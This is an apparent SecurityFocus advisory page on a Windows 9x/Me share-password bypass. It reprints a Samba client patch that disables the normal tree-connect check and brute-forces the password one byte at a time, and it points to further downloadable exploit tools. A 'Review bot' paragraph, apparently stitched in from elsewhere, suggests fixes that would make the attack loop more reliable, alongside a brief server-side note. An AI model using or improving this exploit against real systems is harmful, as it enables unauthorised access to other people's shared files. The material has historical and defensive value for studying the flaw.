Microsoft Windows 9x / Me Share Level Password Bypass Vulnerability

Nsfocus <security@nsfocus.com> has released the following proof-of-concept code:

--- samba-2.0.6.orig/source/client/client.c Thu Nov 11 10:35:59 1999
+++ samba-2.0.6/source/client/client.c Mon Sep 18 21:20:29 2000
@@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve

DEBUG(4,(" session setup ok\n"));

+/*
if (!cli_send_tconX(c, share, "?????",
password, strlen(password)+1)) {
DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
cli_shutdown(c);
return NULL;
}
+*/
+
+ password[0] = 0;
+ c->sec_mode = 0;
+ do{
+
+ password[0]+=1;
+
+ }while(!cli_send_tconX(c, share, "?????", password, 1));

DEBUG(4,(" tconx ok\n"));
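Review bot: the `do { password[0]+=1; } while(!cli_send_tconX(c, share, "?????", password, 1));` loop has no upper bound and no exit on error. Any failure that is not a rejected byte, such as a wrong share name or a dropped session, lets `password[0]` wrap around and the loop spin forever. Because the original block is commented out, the `DEBUG(0, ...)`, `cli_shutdown(c)` and `return NULL` failure path is also gone. Bound the loop to the non-zero byte values and restore that failure path once they are exhausted. The dead block would be better deleted than wrapped in `/* */`, and `c->sec_mode = 0` needs a comment saying what it changes. For anyone reading this from the server side, the argument to note is the last one: the length is 1 where the original call passed `strlen(password)+1`, so the password length in the request is chosen by the client and must not be taken as the number of bytes to compare.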

Björn Stickler <stickler@rbg.informatik.tu-darmstadt.de> has released the following sharehack2.zip for the password verification exploit discovered by Nsfocus Security Team. The program hacks every Win9x/Me share password in less than 2 minutes, or 10 minutes over the Internet (C source code included).

Gabriel Maggiotti <gmaggiot@ciudad.com.ar> has provided the following exploit:

netbios.tar.gz


 

Copyright 2010, SecurityFocus